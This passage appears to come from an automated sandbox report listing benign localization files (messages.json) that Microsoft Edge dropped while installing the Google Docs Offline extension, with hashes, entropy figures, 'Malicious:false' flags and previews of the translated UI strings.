                                                                                                                                                                                                                                                                                                Size (bytes):911
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                                MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                                SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                                SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                                SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):939
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                                MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                                SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                                SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                                SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):977
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):972
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):990
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1658
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                                MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                                SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                                SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                                SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1672
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                                MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                                SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                                SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                                SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):935
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                                MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                                SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                                SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                                SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1065
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                                MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                                SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                                SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                                SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2771
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                                MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                                SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                                SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                                SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):858
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                                MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                                SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                                SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                                SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):954
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                                MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                                SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                                SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                                SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):899
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                                MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                                SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                                SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                                SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2230
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
